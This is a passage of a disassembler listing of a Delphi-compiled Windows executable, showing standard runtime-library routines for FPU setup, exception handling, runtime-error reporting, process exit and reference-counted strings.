dec ch
jnz short loc_402C50
neg eax
loc_402C50: ; CODE XREF: sub_402B88+72�j
; sub_402B88+7B�j ...
pop ecx
xor esi, esi
loc_402C53: ; CODE XREF: sub_402B88+82�j
mov [edx], esi
pop edi
pop esi
pop ebx
retn
sub_402B88 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402C5C proc near ; CODE XREF: sub_402C64+5�p
; sub_402C64+11�p
jmp ds:dword_408100
sub_402C5C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402C64 proc near ; CODE XREF: sub_403AE4+39�p
push ebx
xor ebx, ebx
push 0
call sub_402C5C ; GetKeyboardType
cmp eax, 7
jnz short loc_402C8F
push 1
call sub_402C5C ; GetKeyboardType
and eax, 0FF00h
cmp eax, 0D00h
jz short loc_402C8D
cmp eax, 400h
jnz short loc_402C8F
loc_402C8D: ; CODE XREF: sub_402C64+20�j
mov bl, 1
loc_402C8F: ; CODE XREF: sub_402C64+D�j
; sub_402C64+27�j
mov eax, ebx
pop ebx
retn
sub_402C64 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C94 proc near ; CODE XREF: sub_403AE4+42�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
movzx eax, ds:word_406010
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push 1
push 0
push offset aSoftwareBorlan ; "SOFTWARE\\Borland\\Delphi\\RTL"
push 80000002h
call sub_401080 ; RegOpenKeyExA
test eax, eax
jnz short loc_402D0C
xor eax, eax
push ebp
push offset loc_402D05
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_C], 4
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0
push offset aFpumaskvalue ; "FPUMaskValue"
mov eax, [ebp+var_4]
push eax
call sub_401088 ; RegQueryValueExA
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402D0C
loc_402CFB: ; CODE XREF: sub_402C94+76�j
mov eax, [ebp+var_4]
push eax
call sub_401078 ; RegCloseKey
retn
; ---------------------------------------------------------------------------
loc_402D05: ; DATA XREF: sub_402C94+2E�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_402CFB
; ---------------------------------------------------------------------------
loc_402D0C: ; CODE XREF: sub_402C94+29�j
; DATA XREF: sub_402C94+62�o
mov ax, ds:word_406010
and ax, 0FFC0h
mov dx, word ptr [ebp+var_8]
and dx, 3Fh
or ax, dx
mov ds:word_406010, ax
mov esp, ebp
pop ebp
retn
sub_402C94 endp
; ---------------------------------------------------------------------------
align 4
aSoftwareBorlan db 'SOFTWARE\Borland\Delphi\RTL',0 ; DATA XREF: sub_402C94+18�o
aFpumaskvalue db 'FPUMaskValue',0 ; DATA XREF: sub_402C94+4C�o
align 4
; =============== S U B R O U T I N E =======================================
sub_402D58 proc near ; CODE XREF: sub_4031E8-368�p
; CODE:0040312E�p ...
fninit
wait
fldcw ds:word_406010
retn
sub_402D58 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402D64 proc near ; CODE XREF: CODE:00402F7F�j
; sub_402FC4+30�p ...
test eax, eax
jz short locret_402D6F
mov dl, 1
mov ecx, [eax]
call dword ptr [ecx-4]
locret_402D6F: ; CODE XREF: sub_402D64+2�j
retn
sub_402D64 endp
; =============== S U B R O U T I N E =======================================
sub_402D70 proc near ; CODE XREF: sub_402FC4+35�p
cmp ds:byte_406014, 1
jbe short locret_402D8A
push 0
push 0
push 0
push 0EEDFADFh
call ds:off_407010
locret_402D8A: ; CODE XREF: sub_402D70+7�j
retn
sub_402D70 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402D8C proc near ; CODE XREF: sub_4031E8-33B�p
cmp ds:byte_406014, 0
jz short locret_402DAC
push eax
push eax
push edx
push esp
push 2
push 0
push 0EEDFAE4h
call ds:off_407010
add esp, 8
pop eax
locret_402DAC: ; CODE XREF: sub_402D8C+7�j
retn
sub_402D8C endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402DC8
loc_402DB0: ; CODE XREF: sub_402DC8+B�j
push esp
push 1
push 0
push 0EEDFAE0h
call ds:off_407010
add esp, 4
pop eax
retn
; END OF FUNCTION CHUNK FOR sub_402DC8
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402DC8 proc near ; CODE XREF: sub_4031E8-28B�p
; FUNCTION CHUNK AT 00402DB0 SIZE 00000015 BYTES
cmp ds:byte_406014, 1
jbe short locret_402DD8
push eax
push ebx
jmp loc_402DB0
; ---------------------------------------------------------------------------
locret_402DD8: ; CODE XREF: sub_402DC8+7�j
retn
sub_402DC8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402DDC proc near ; CODE XREF: sub_402DFC+C�p
test ecx, ecx
jz short locret_402DF9
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_402DF4
cmp byte ptr [ecx], 0EBh
jnz short locret_402DF9
movsx eax, al
inc ecx
inc ecx
jmp short loc_402DF7
; ---------------------------------------------------------------------------
loc_402DF4: ; CODE XREF: sub_402DDC+A�j
add ecx, 5
loc_402DF7: ; CODE XREF: sub_402DDC+16�j
add ecx, eax
locret_402DF9: ; CODE XREF: sub_402DDC+2�j
; sub_402DDC+F�j
retn
sub_402DDC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402DFC proc near ; CODE XREF: sub_40191C+1695�p
cmp ds:byte_406014, 1
jbe short locret_402E22
push eax
push edx
push ecx
call sub_402DDC
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call ds:off_407010
pop ecx
pop ecx
pop edx
pop eax
locret_402E22: ; CODE XREF: sub_402DFC+7�j
retn
sub_402DFC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402E24 proc near ; CODE XREF: sub_403018+28�p
cmp ds:byte_406014, 1
jbe short locret_402E3F
push edx
push esp
push 1
push 0
push 0EEDFAE2h
call ds:off_407010
pop edx
locret_402E3F: ; CODE XREF: sub_402E24+7�j
retn
sub_402E24 endp
; =============== S U B R O U T I N E =======================================
sub_402E40 proc near ; CODE XREF: CODE:loc_403175�p
push eax
push edx
cmp ds:byte_406014, 1
jbe short loc_402E5B
push esp
push 2
push 0
push 0EEDFAE3h
call ds:off_407010
loc_402E5B: ; CODE XREF: sub_402E40+9�j
pop edx
pop eax
retn
sub_402E40 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_4031E8
loc_402E60: ; CODE XREF: sub_4031E8:loc_40323D�j
; sub_403258:loc_4032AD�j ...
mov eax, [esp-4+arg_0]
test dword ptr [eax+4], 6
jnz loc_402F84
cmp dword ptr [eax], 0EEDFADEh
mov edx, [eax+18h]
mov ecx, [eax+14h]
jz short loc_402EED
cld
call sub_402D58
mov edx, ds:dword_40700C
test edx, edx
jz loc_402F84
call edx ; dword_40700C
test eax, eax
jz loc_402F84
mov edx, [esp-4+arg_8]
mov ecx, [esp-4+arg_0]
cmp dword ptr [ecx], 0EEFFACEh
jz short loc_402EE4
call sub_402D8C
cmp ds:byte_406018, 0
jbe short loc_402EE4
cmp ds:byte_406014, 0
ja short loc_402EE4
lea ecx, [esp-4+arg_0]
push eax
push ecx
call sub_401018 ; UnhandledExceptionFilter
cmp eax, 0
pop eax
jz loc_402F84
mov edx, eax
mov eax, [esp+4]
mov ecx, [eax+0Ch]
jmp short loc_402F14
; ---------------------------------------------------------------------------
loc_402EE4: ; CODE XREF: sub_4031E8-33D�j
; sub_4031E8-32F�j ...
mov edx, eax
mov eax, [esp-4+arg_0]
mov ecx, [eax+0Ch]
loc_402EED: ; CODE XREF: sub_4031E8-36B�j
cmp ds:byte_406018, 1
jbe short loc_402F14
cmp ds:byte_406014, 0
ja short loc_402F14
push eax
lea eax, [esp+arg_0]
push edx
push ecx
push eax
call sub_401018 ; UnhandledExceptionFilter
cmp eax, 0
pop ecx
pop edx
pop eax
jz short loc_402F84
loc_402F14: ; CODE XREF: sub_4031E8-306�j
; sub_4031E8-2F4�j ...
or dword ptr [eax+4], 2
push ebx
xor ebx, ebx
push esi
push edi
push ebp
mov ebx, fs:[ebx]
push ebx
push eax
push edx
push ecx
mov edx, [esp+20h+arg_0]
push 0
push eax
push offset loc_402F38
push edx
call ds:off_407014
loc_402F38: ; DATA XREF: sub_4031E8-2BC�o
mov edi, [esp+30h+var_8]
call sub_403C48
push dword ptr [eax+0]
mov [eax+0], esp
mov ebp, [edi+8]
mov ebx, [edi+4]
mov dword ptr [edi+4], offset sub_402F64
add ebx, 5
call sub_402DC8
jmp ebx
; END OF FUNCTION CHUNK FOR sub_4031E8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402F64 proc near ; DATA XREF: sub_4031E8-295�o
jmp loc_402F8C
sub_402F64 endp
; ---------------------------------------------------------------------------
call sub_403C48
mov ecx, [eax+0]
mov edx, [ecx]
mov [eax+0], edx
mov eax, [ecx+8]
jmp sub_402D64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4031E8
loc_402F84: ; CODE XREF: sub_4031E8-37D�j
; sub_4031E8-35B�j ...
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_4031E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_40191C
loc_402F8C: ; CODE XREF: sub_40191C:loc_4019E4�j
; sub_4019F4:loc_401AE8�j ...
mov eax, [esp+4]
mov edx, [esp+8]
test dword ptr [eax+4], 6
jz short loc_402FBC
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_402FBC
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_402DFC
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_402FBC: ; CODE XREF: sub_40191C+167F�j
; DATA XREF: sub_40191C+1684�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_40191C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402FC4 proc near ; CODE XREF: sub_4031E8+5F�p
; sub_403258+5F�p
arg_2C = dword ptr 30h
mov eax, [esp+arg_2C]
mov dword ptr [eax+4], offset loc_40300F
call sub_403C48
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+0Ch]
and dword ptr [eax+4], 0FFFFFFFDh
cmp dword ptr [eax], 0EEDFADEh
jz short loc_402FFE
mov eax, [edx+8]
call sub_402D64
call sub_402D70
loc_402FFE: ; CODE XREF: sub_402FC4+2B�j
xor eax, eax
add esp, 14h
mov edx, fs:[eax]
pop ecx
mov edx, [edx]
mov [ecx], edx
pop ebp
pop edi
pop esi
pop ebx
loc_40300F: ; DATA XREF: sub_402FC4+4�o
mov eax, 1
retn
sub_402FC4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403018 proc near ; CODE XREF: sub_4031E8+64�p
; sub_403258+64�p ...
arg_2C = dword ptr 30h
call sub_403C48
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+8]
call sub_402D64
pop edx
mov esp, [esp-4+arg_2C]
xor eax, eax
pop ecx
mov fs:[eax], ecx
pop eax
pop ebp
call sub_402E24
jmp edx
sub_403018 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403048 proc near ; CODE XREF: sub_402178+10C�p
; sub_402178+16A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor edx, edx
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
add ecx, 5
mov fs:[edx], eax
call ecx
retn 0Ch
sub_403048 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
loc_403060: ; CODE XREF: CODE:00403160�j
; CODE:0040316C�j
push ebp
mov ebp, esp
mov edx, [ebp+8]
mov eax, [edx]
cmp eax, 0C0000092h
jg short loc_40309B
jz short loc_4030CD
cmp eax, 0C000008Eh
jg short loc_40308D
jz short loc_4030D1
sub eax, 0C0000005h
jz short loc_4030DD
sub eax, 87h
jz short loc_4030C5
dec eax
jz short loc_4030D9
jmp short loc_4030ED
; ---------------------------------------------------------------------------
loc_40308D: ; CODE XREF: CODE:00403076�j
add eax, 3FFFFF71h
sub eax, 2
jb short loc_4030CD
jz short loc_4030C9
jmp short loc_4030ED
; ---------------------------------------------------------------------------
loc_40309B: ; CODE XREF: CODE:0040306D�j
cmp eax, 0C0000096h
jg short loc_4030B3
jz short loc_4030E1
sub eax, 0C0000093h
jz short loc_4030D9
dec eax
jz short loc_4030C1
dec eax
jz short loc_4030D5
jmp short loc_4030ED
; ---------------------------------------------------------------------------
loc_4030B3: ; CODE XREF: CODE:004030A0�j
sub eax, 0C00000FDh
jz short loc_4030E9
sub eax, 3Dh
jz short loc_4030E5
jmp short loc_4030ED
; ---------------------------------------------------------------------------
loc_4030C1: ; CODE XREF: CODE:004030AC�j
mov al, 0C8h
jmp short loc_4030EF
; ---------------------------------------------------------------------------
loc_4030C5: ; CODE XREF: CODE:00403086�j
mov al, 0C9h
jmp short loc_4030EF
; ---------------------------------------------------------------------------
loc_4030C9: ; CODE XREF: CODE:00403097�j
mov al, 0CDh
jmp short loc_4030EF
; ---------------------------------------------------------------------------
loc_4030CD: ; CODE XREF: CODE:0040306F�j
; CODE:00403095�j
mov al, 0CFh
jmp short loc_4030EF
; ---------------------------------------------------------------------------
loc_4030D1: ; CODE XREF: CODE:00403078�j
mov al, 0C8h
jmp short loc_4030EF
; ---------------------------------------------------------------------------
loc_4030D5: ; CODE XREF: CODE:004030AF�j
mov al, 0D7h
jmp short loc_4030EF
; ---------------------------------------------------------------------------
loc_4030D9: ; CODE XREF: CODE:00403089�j
; CODE:004030A9�j
mov al, 0CEh
jmp short loc_4030EF
; ---------------------------------------------------------------------------
loc_4030DD: ; CODE XREF: CODE:0040307F�j
mov al, 0D8h
jmp short loc_4030EF
; ---------------------------------------------------------------------------
loc_4030E1: ; CODE XREF: CODE:004030A2�j
mov al, 0DAh
jmp short loc_4030EF
; ---------------------------------------------------------------------------
loc_4030E5: ; CODE XREF: CODE:004030BD�j
mov al, 0D9h
jmp short loc_4030EF
; ---------------------------------------------------------------------------
loc_4030E9: ; CODE XREF: CODE:004030B8�j
mov al, 0CAh
jmp short loc_4030EF
; ---------------------------------------------------------------------------
loc_4030ED: ; CODE XREF: CODE:0040308B�j
; CODE:00403099�j ...
mov al, 0FFh
loc_4030EF: ; CODE XREF: CODE:004030C3�j
; CODE:004030C7�j ...
and eax, 0FFh
mov edx, [edx+0Ch]
call sub_40286C
; ---------------------------------------------------------------------------
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_403100: ; DATA XREF: sub_4031A0+D�o
mov eax, [esp+4]
test dword ptr [eax+4], 6
jnz loc_40319A
cmp ds:byte_406014, 0
ja short loc_403129
lea eax, [esp+4]
push eax
call sub_401018 ; UnhandledExceptionFilter
cmp eax, 0
jz short loc_40319A
loc_403129: ; CODE XREF: CODE:00403118�j
mov eax, [esp+4]
cld
call sub_402D58
mov edx, [esp+8]
push 0
push eax
push offset loc_403146
push edx
call ds:off_407014
loc_403146: ; DATA XREF: CODE:0040313A�o
mov ebx, [esp+4]
cmp dword ptr [ebx], 0EEDFADEh
mov edx, [ebx+14h]
mov eax, [ebx+18h]
jz short loc_403175
mov edx, ds:dword_40700C
test edx, edx
jz loc_403060
mov eax, ebx
call edx ; dword_40700C
test eax, eax
jz loc_403060
mov edx, [ebx+0Ch]
loc_403175: ; CODE XREF: CODE:00403156�j
call sub_402E40
mov ecx, ds:dword_407004
test ecx, ecx
jz short loc_403186
call ecx ; dword_407004
loc_403186: ; CODE XREF: CODE:00403182�j
mov ecx, [esp+4]
mov eax, 0D9h
mov edx, [ecx+14h]
mov [esp], edx
jmp sub_40350C
; ---------------------------------------------------------------------------
loc_40319A: ; CODE XREF: CODE:0040310B�j
; CODE:00403127�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4031A0 proc near ; CODE XREF: sub_4032C8+2E�p
xor edx, edx
lea eax, [ebp-0Ch]
mov ecx, fs:[edx]
mov fs:[edx], eax
mov [eax], ecx
mov dword ptr [eax+4], offset loc_403100
mov [eax+8], ebp
mov ds:dword_407624, eax
retn
sub_4031A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4031C0 proc near ; CODE XREF: sub_403420:loc_4034B0�p
xor edx, edx
mov eax, ds:dword_407624
test eax, eax
jz short locret_4031E7
mov ecx, fs:[edx]
cmp eax, ecx
jnz short loc_4031DA
mov eax, [eax]
mov fs:[edx], eax
retn
; ---------------------------------------------------------------------------
loc_4031D8: ; CODE XREF: sub_4031C0+21�j
mov ecx, [ecx]
loc_4031DA: ; CODE XREF: sub_4031C0+10�j
cmp ecx, 0FFFFFFFFh
jz short locret_4031E7
cmp [ecx], eax
jnz short loc_4031D8
mov eax, [eax]
mov [ecx], eax
locret_4031E7: ; CODE XREF: sub_4031C0+9�j
; sub_4031C0+1D�j
retn
sub_4031C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4031E8 proc near ; CODE XREF: sub_4031E8+5A�p
; sub_403258+5A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00402E60 SIZE 00000104 BYTES
; FUNCTION CHUNK AT 00402F84 SIZE 00000006 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov esi, offset dword_407620
mov eax, [esi+8]
test eax, eax
jz short loc_403251
mov ebx, [esi+0Ch]
mov eax, [eax+4]
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_40323D
push dword ptr fs:[eax]
mov fs:[eax], esp
test ebx, ebx
jle short loc_403233
loc_403218: ; CODE XREF: sub_4031E8+49�j
dec ebx
mov [esi+0Ch], ebx
mov eax, [ebp+var_4]
mov eax, [eax+ebx*8+4]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40322F
call [ebp+var_8]
loc_40322F: ; CODE XREF: sub_4031E8+42�j
test ebx, ebx
jg short loc_403218
loc_403233: ; CODE XREF: sub_4031E8+2E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_403251
; ---------------------------------------------------------------------------
loc_40323D: ; DATA XREF: sub_4031E8+21�o
jmp loc_402E60
; ---------------------------------------------------------------------------
call sub_4031E8
call sub_402FC4
call sub_403018
loc_403251: ; CODE XREF: sub_4031E8+13�j
; sub_4031E8+53�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_4031E8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403258 proc near ; CODE XREF: sub_4032C8+3A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov edi, offset dword_407620
mov eax, [edi+8]
test eax, eax
jz short loc_4032C1
mov esi, [eax]
xor ebx, ebx
mov eax, [eax+4]
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_4032AD
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp esi, ebx
jle short loc_4032A3
loc_403289: ; CODE XREF: sub_403258+49�j
mov eax, [ebp+var_4]
mov eax, [eax+ebx*8]
mov [ebp+var_8], eax
inc ebx
mov [edi+0Ch], ebx
cmp [ebp+var_8], 0
jz short loc_40329F
call [ebp+var_8]
loc_40329F: ; CODE XREF: sub_403258+42�j
cmp esi, ebx
jg short loc_403289
loc_4032A3: ; CODE XREF: sub_403258+2F�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_4032C1
; ---------------------------------------------------------------------------
loc_4032AD: ; DATA XREF: sub_403258+22�o
jmp loc_402E60
; ---------------------------------------------------------------------------
call sub_4031E8
call sub_402FC4
call sub_403018
loc_4032C1: ; CODE XREF: sub_403258+13�j
; sub_403258+53�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_403258 endp
; =============== S U B R O U T I N E =======================================
sub_4032C8 proc near ; CODE XREF: sub_403C94+3A�p
mov ds:off_407010, offset sub_401008
mov ds:off_407014, offset sub_401010
mov ds:off_407628, eax
xor eax, eax
mov ds:dword_40762C, eax
mov ds:off_407630, edx
mov eax, [edx+4]
mov ds:dword_40701C, eax
call sub_4031A0
mov ds:byte_407024, 0
call sub_403258
retn
sub_4032C8 endp
; =============== S U B R O U T I N E =======================================
sub_403308 proc near ; CODE XREF: sub_403420+34�p
push ebx
push esi
push edi
mov esi, offset aRuntimeErrorAt ; "Runtime error at 00000000"
mov cl, 10h
mov ebx, ds:dword_406000
loc_403318: ; CODE XREF: sub_403308+33�j
mov eax, ebx
mov edi, 0Ah
cdq
idiv edi
add dl, 30h
xor eax, eax
mov al, cl
mov [esi+eax], dl
mov eax, ebx
mov ebx, 0Ah
cdq
idiv ebx
mov ebx, eax
dec ecx
test ebx, ebx
jnz short loc_403318
mov cl, 1Ch
mov eax, ds:dword_406004
loc_403344: ; CODE XREF: sub_403308+54�j
mov edx, eax
and edx, 0Fh
mov dl, ds:byte_406078[edx]
xor ebx, ebx
mov bl, cl
mov [esi+ebx], dl
shr eax, 4
dec ecx
test eax, eax
jnz short loc_403344
pop edi
pop esi
pop ebx
retn
sub_403308 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403364 proc near ; CODE XREF: sub_403420+A4�p
xor eax, eax
xchg eax, ds:dword_406000
neg eax
sbb eax, eax
inc eax
mov edi, offset dword_407620
mov ebx, [edi+18h]
mov ebp, [edi+14h]
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
leave
retn 0Ch
sub_403364 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403394 proc near ; CODE XREF: sub_403420+39�p
var_4 = byte ptr -4
push ecx
cmp ds:byte_407034, 0
jz short loc_4033F5
cmp ds:word_407208, 0D7B2h
jnz short loc_4033BD
cmp ds:dword_407210, 0
jbe short loc_4033BD
mov eax, offset dword_407204
call ds:dword_407220
loc_4033BD: ; CODE XREF: sub_403394+13�j
; sub_403394+1C�j
push 0
lea eax, [esp+8+var_4]
push eax
push 1Eh
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0FFFFFFF5h
call sub_401000 ; GetStdHandle
push eax
call sub_401020 ; WriteFile
push 0
lea eax, [esp+8+var_4]
push eax
push 2
push offset dword_40341C
push 0FFFFFFF5h
call sub_401000 ; GetStdHandle
push eax
call sub_401020 ; WriteFile
pop edx
retn
; ---------------------------------------------------------------------------
loc_4033F5: ; CODE XREF: sub_403394+8�j
cmp ds:byte_40601C, 0
jnz short loc_403411
push 0
push offset aError ; "Error"
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0
call sub_401038 ; MessageBoxA
loc_403411: ; CODE XREF: sub_403394+68�j
pop edx
retn
sub_403394 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_40341C dd 0A0Dh
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403420 proc near ; CODE XREF: sub_403500+5�p
; CODE:00404EC6�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov ebx, offset dword_407620
mov esi, offset dword_407030
cmp byte ptr [ebx+28h], 0
jnz short loc_40344B
cmp dword ptr [esi], 0
jz short loc_40344B
loc_40343A: ; CODE XREF: sub_403420+29�j
mov eax, [esi]
mov [esp+14h+var_14], eax
xor eax, eax
mov [esi], eax
call [esp+14h+var_14]
cmp dword ptr [esi], 0
jnz short loc_40343A
loc_40344B: ; CODE XREF: sub_403420+13�j
; sub_403420+18�j
cmp ds:dword_406004, 0
jz short loc_403465
call sub_403308
call sub_403394
xor eax, eax
mov ds:dword_406004, eax
loc_403465: ; CODE XREF: sub_403420+32�j
; sub_403420+D5�j
cmp byte ptr [ebx+28h], 2
jnz short loc_403479
cmp ds:dword_406000, 0
jnz short loc_403479
xor eax, eax
mov [ebx+0Ch], eax
loc_403479: ; CODE XREF: sub_403420+49�j
; sub_403420+52�j
call sub_4031E8
cmp byte ptr [ebx+28h], 1
jbe short loc_40348D
cmp ds:dword_406000, 0
jz short loc_4034B0
loc_40348D: ; CODE XREF: sub_403420+62�j
mov edi, [ebx+10h]
test edi, edi
jz short loc_4034B0
mov eax, edi
call sub_403998
mov ebp, [ebx+10h]
mov esi, [ebp+10h]
cmp esi, [ebp+4]
jz short loc_4034B0
test esi, esi
jz short loc_4034B0
push esi
call sub_401040 ; FreeLibrary
loc_4034B0: ; CODE XREF: sub_403420+6B�j
; sub_403420+72�j ...
call sub_4031C0
cmp byte ptr [ebx+28h], 1
jnz short loc_4034BE
call dword ptr [ebx+24h]
loc_4034BE: ; CODE XREF: sub_403420+99�j
cmp byte ptr [ebx+28h], 0
jz short loc_4034C9
call sub_403364
loc_4034C9: ; CODE XREF: sub_403420+A2�j
cmp dword ptr [ebx], 0
jnz short loc_4034E8
cmp ds:dword_407018, 0
jz short loc_4034DD
call ds:dword_407018
loc_4034DD: ; CODE XREF: sub_403420+B5�j
mov eax, ds:dword_406000
push eax
call sub_401030 ; ExitProcess
loc_4034E8: ; CODE XREF: sub_403420+AC�j
mov eax, [ebx]
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
jmp loc_403465
sub_403420 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403500 proc near ; CODE XREF: sub_40286C+6�p
; sub_40350C+6�j ...
mov ds:dword_406000, eax
call sub_403420
sub_403500 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40350C proc near ; CODE XREF: CODE:00403195�j
; sub_403BF8+1B�p ...
pop ds:dword_406004
jmp sub_403500
sub_40350C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403518 proc near ; CODE XREF: sub_402A84+E�p
; sub_4035DC+23�p ...
mov edx, [eax]
test edx, edx
jz short locret_40353A
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_40353A
lock dec dword ptr [edx-8]
jnz short locret_40353A
push eax
lea eax, [edx-8]
call sub_4027FC
pop eax
locret_40353A: ; CODE XREF: sub_403518+4�j
; sub_403518+10�j ...
retn
sub_403518 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40353C proc near ; CODE XREF: sub_4042A4+18D�p
; sub_4042A4+1A2�p ...
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_403542: ; CODE XREF: sub_40353C+2A�j
mov edx, [ebx]
test edx, edx
jz short loc_403562
mov dword ptr [ebx], 0
mov ecx, [edx-8]
dec ecx
jl short loc_403562
lock dec dword ptr [edx-8]
jnz short loc_403562
lea eax, [edx-8]
call sub_4027FC
loc_403562: ; CODE XREF: sub_40353C+A�j
; sub_40353C+16�j ...
add ebx, 4
dec esi
jnz short loc_403542
pop esi
pop ebx
retn
sub_40353C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40356C proc near ; CODE XREF: sub_403688+8�j
; sub_4042A4+173�p ...
test edx, edx
jz short loc_403594
mov ecx, [edx-8]
inc ecx
jg short loc_403590
push eax
push edx
mov eax, [edx-4]
call sub_4035B0
mov edx, eax
pop eax
push edx
mov ecx, [eax-4]
call sub_4028E0
pop edx
pop eax
jmp short loc_403594
; ---------------------------------------------------------------------------
loc_403590: ; CODE XREF: sub_40356C+8�j
lock inc dword ptr [edx-8]
loc_403594: ; CODE XREF: sub_40356C+2�j
; sub_40356C+22�j
xchg edx, [eax]
test edx, edx
jz short locret_4035AE
mov ecx, [edx-8]
dec ecx
jl short locret_4035AE
lock dec dword ptr [edx-8]
jnz short locret_4035AE
lea eax, [edx-8]
call sub_4027FC
locret_4035AE: ; CODE XREF: sub_40356C+2C�j
; sub_40356C+32�j ...
retn
sub_40356C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4035B0 proc near ; CODE XREF: sub_40356C+F�p
; sub_4035DC+B�p ...
test eax, eax
jle short loc_4035D8
push eax
add eax, 0Ah
and eax, 0FFFFFFFEh
push eax
call sub_4027CC
pop edx
mov word ptr [edx+eax-2], 0
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
retn
; ---------------------------------------------------------------------------
loc_4035D8: ; CODE XREF: sub_4035B0+2�j
xor eax, eax
retn
sub_4035B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4035DC proc near ; CODE XREF: sub_402A84+30�p
; sub_403628+8�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_4035B0
mov ecx, edi
mov edi, eax
test esi, esi
